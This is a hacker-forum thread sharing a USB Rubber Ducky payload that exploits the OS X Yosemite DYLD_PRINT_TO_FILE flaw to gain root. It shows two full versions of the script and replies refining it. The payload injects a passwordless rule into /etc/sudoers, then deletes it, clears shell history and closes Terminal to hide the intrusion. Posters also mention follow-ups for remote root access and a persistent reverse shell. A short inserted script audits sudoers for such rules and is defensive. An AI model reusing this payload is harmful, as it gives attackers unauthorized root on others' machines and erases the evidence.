[Payload] [Mac OS X] DYLD_PRINT_TO_FILE Privilege Escalation + cleanup


V3sth4cks153

Hi everyone !

I just saw this on thehackernews.com, and I thought I'd make a Rubber Ducky Payload for it.

This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10.3 Yosemite.
NOTE: Since the payload uses the username of the victim, I had to make it delete a bit more than the exact length of the added text in the sudoers file (the exploit command adds this to the sudoers file, located at /etc/sudoers : "username ALL=(ALL) NOPASSWD:ALL"). This shouldn't be a problem because the last few lines are commented out. Also having a super, super long username, like 30ish characters (which I don't even know if it's possible) can be a problem. If ever you need it, here is the default sudoers file for Mac OS X 10.10 Yosemite.
Hope you like it !
********************* USE THIS PAYLOAD AT YOUR OWN RISK ! *********************

Here is the code:

REM Author: V3sth4cks153
REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER 
REM *                                                                                       *
REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
REM *                                                                                       *
REM --------------- CLEANUP ---------------
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DOWNARROW
REPEAT 50
RIGHTARROW
REPEAT 40
STRING i
RIGHTARROW
BACKSPACE
REPEAT 35
ESC
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q
Edited by V3sth4cks153
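
Added example (not part of the original post, and not the author's code): a defender-side check for the rule this payload appends to /etc/sudoers. The function names, the constructed sample files and the user "alice" are assumptions of the example.

```shell
#!/bin/sh
# Added example, not from the thread. Sample data below is constructed.

# audit_sudoers FILE: print "LINENO:RULE" for every active (uncommented) rule
# that grants NOPASSWD on ALL commands; exit status 1 if any was found.
audit_sudoers() {
    awk '
        /^[ \t]*#/ { next }          # comment lines
        /^[ \t]*$/ { next }          # blank lines
        /NOPASSWD:[ \t]*ALL[ \t]*$/ || /NOPASSWD:[ \t]*ALL[ \t]*,/ {
            printf "%d:%s\n", NR, $0; hit = 1
        }
        END { exit hit + 0 }
    ' "$1"
}

# added_lines BASELINE CURRENT: print lines of CURRENT that do not occur
# verbatim in BASELINE (an appended rule shows up here).
added_lines() {
    grep -vxFf "$1" "$2" || true
}

# write_samples DIR: constructed baseline plus a tampered copy with one rule
# appended for the hypothetical user "alice".
write_samples() {
    cat > "$1/baseline" <<'EOF'
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
# %wheel ALL=(ALL) NOPASSWD: ALL
EOF
    cp "$1/baseline" "$1/tampered"
    echo 'alice ALL=(ALL) NOPASSWD:ALL' >> "$1/tampered"
}

tmp=$(mktemp -d)
write_samples "$tmp"
audit_sudoers "$tmp/baseline" && echo "baseline: clean"
audit_sudoers "$tmp/tampered" || echo "tampered: passwordless ALL rule found"
added_lines "$tmp/baseline" "$tmp/tampered"
rm -rf "$tmp"
```

On a real system, run it as root against /etc/sudoers with a known-good copy as the baseline; `visudo -c` separately checks the file's syntax.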

Nice! The only thing I'd change is your cleanup operation. Depending on how long someone's username is it could overwrite and erase other parts of the sudoers file. I'd suggest using nano then CTRL-k to cut the whole line out instead of worrying about removing a certain number of chars.

Other than that, it's a nice implementation. Let's see how long it takes Apple to push out a patch?


> Nice! The only thing I'd change is your cleanup operation. Depending on how long someone's username is it could overwrite and erase other parts of the sudoers file. I'd suggest using nano then CTRL-k to cut the whole line out instead of worrying about removing a certain number of chars.
>
> Other than that, it's a nice implementation. Let's see how long it takes Apple to push out a patch?

Thanks ! I'm glad you like it !

You're right about the cleanup operation. The only problem I had is you can't edit the sudoers file with any editor other than visudo, which is basically VIM. I just found out today that by using the ":$d" command in visudo you could delete the last line. It is better in every way as the payload is then smaller, so faster !

I'm currently working on an application of this exploit, which uploads a text file containing the ip of the victim, and then changes the root password to anything you want so that you can ssh/sftp to the victim ! I'll post it on the forums when it's done.

DONE !

As for Apple, like it's said in the article, they generally don't patch current versions of their OS, but they include a fix in the next version instead. Which I hope they won't do this time since this is far more dangerous than just making your iPhone reboot !

Here is the modified code (It's also on my GitHub) :

REM Author: V3sth4cks153
REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER 
REM *                                                                                       *
REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
REM *                                                                                       *
REM --------------- CLEANUP ---------------
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DELAY 500
STRING :$d
ENTER
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q
Edited by V3sth4cks153

Oh, I see what you mean! That is much nicer than using nano. (I've never had any trouble using nano to edit /etc/sudoers as I sudo'd it first?) I've never really been able to get along with vi.

Apple are still likely to be pretty slow at patching this. If it was a serious RCE then we might see a different reaction, but in the real world, people are so precious of their Macs that it's gonna be so hard to get the physical access to a machine that you need to exploit this. (That's Apple's justification, anyway!).


> Oh, I see what you mean! That is much nicer than using nano. (I've never had any trouble using nano to edit /etc/sudoers as I sudo'd it first?) I've never really been able to get along with vi.
>
> Apple are still likely to be pretty slow at patching this. If it was a serious RCE then we might see a different reaction, but in the real world, people are so precious of their Macs that it's gonna be so hard to get the physical access to a machine that you need to exploit this. (That's Apple's justification, anyway!).

It is indeed ! I personally also prefer nano, but then I saw this text in the sudoers file which convinced me there must be a reason why Apple says to use visudo.

# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
# Failure to use 'visudo' may result in syntax or file permission errors
# that prevent sudo from running.
#

I also think Apple will likely be slow at patching this. But by searching for "DYLD_PRINT_TO_FILE post module" on Google, I found this which pretty much means that if an attacker has user-level control of your Mac already, he can use this module to take full control of the machine, even without physical access ! But since it's already been 5 days since this has been discovered, I find it really unlikely that Apple will release a patch.

Edited by V3sth4cks153

  • 2 weeks later...

This vulnerability is great!

I've just created a payload for a persistent reverse bash in OS X using it:

https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/

About visudo:

I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this:

REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 200

I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.

Hope it helps!


> This vulnerability is great!
>
> I've just created a payload for a persistent reverse bash in OS X using it:
>
> https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/
>
> About visudo:
>
> I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this:
>
> REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
> STRING echo -e '$d\nw\nq'| ed /etc/sudoers
> ENTER
> DELAY 200
>
> I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.
>
> Hope it helps!

Hi. That's really cool !

It's even better than the ":$d" command in visudo ! Being a bit of a bash beginner, I didn't even think about not opening the file in the first place... I'll test it on my computer when I'm back home from holidays.

Edited by V3sth4cks153

To disable it you just should run:

sudo crontab -e

in the victim's computer. This will open a text editor and you just have to remove only the last line which is the one that the script created. Then save and you're done.

Ok great ! Thanks ! I'll give my feedback as soon as I get a chance to test it.

